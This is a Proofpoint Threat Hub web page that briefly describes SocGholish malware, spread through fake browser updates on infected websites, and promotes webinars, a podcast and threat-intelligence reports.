us:
English: Americas
Threat Hub
The Proofpoint threat research team has access to one of the largest, most diverse data sets in all of cybersecurity. We’re bringing you the highlights every week, right here at the Threat Hub.
SocGholish: real updates on a fake-update attack. And the latest Emotet developments on our podcast.
This week on The Threat Hub: Most of the malware we talk about on the Hub is delivered by malicious links or attachments embedded in email. But SocGholish, distributed by threat actor TA569, is different. This malware spreads by JavaScript injects on infected websites. There can be hundreds—even thousands—of websites infected at any one time, and anyone visiting them has the potential to be attacked. The mechanism of infection is a fake browser update that appears if the user meets certain criteria. Once a system is infected, TA569 can launch a number of potential follow-on attacks, including selling access on to ransomware attackers. We’ve just published part one of a deep dive into SocGholish on the Threat Insight blog, with part two coming soon.
But if you’re eager to find out more now, blog author Andrew Northern recently gave a webinar update on SocGholish. At the start of the month this malware was implicated in a supply chain attack affecting hundreds of media websites. The webinar recording contains a rundown of attack chains, TA569 TTPs and tips on how to stay ahead of the threat.
And on this week’s Five-Minute Forecast, a Twitter data breach exposes millions of phone numbers, U.S. authorities seize “pig butchering” sites, and senior reverse engineer Pim Trouerbach shares the latest Emotet developments.
The group behind Socgholish moves fast. In just 96 hours, ransomware can be installed on a machine infected with the initial SocGholish payload. It's likely that TA569 acts as an initial access facilitator for other threat actors.
Equip your team with threat intelligence
Reviewing state-sponsored attacks and major league malware activity from the first half of the year.
Messaging services help business communicate with users at scale—but they're also a target for abuse.
Exploring two years of attacks and lures exploiting fear and uncertainty about COVID-19.
Go Deeper with Proofpoint Threat Intelligence Services
Connect with threat analysts, understand threats with intelligence specific to your situation, and gain 24/7 visibility into the latest threat discoveries.
Learn MoreCyberattackers target people. They exploit people. Ultimately, they are people. That’s why the Human Factor report focuses on how technology and psychology combine to make people so susceptible to modern cyber threats. In this first volume, we take a closer look at attacks that rely on social engineering, including business email compromise (BEC) threats, email fraud and phishing.
Find out how vulnerable your users are to today’s biggest cyber threats in the 2024 State of the Phish report. Learn phishing trends, key insights, statistics, and more.
About The Threat Research Team
Our threat researchers are responsible for tracking shifts in the cybersecurity landscape, identifying new attacks as they emerge, and monitoring how threat actor tactics, techniques and procedures change over time. The threats they detect and the signatures they write feed into our platforms and are keystones in a system that analyzes more than 2.6 billion emails, 49 billion URLs and 1.9 billion attachments every single day.
By studying what cyber criminals are doing now, our threat researchers are better able to anticipate what they’ll do next. Every day, their work keeps our customers protected—not just from today’s attacks, but tomorrow’s threats as they evolve.
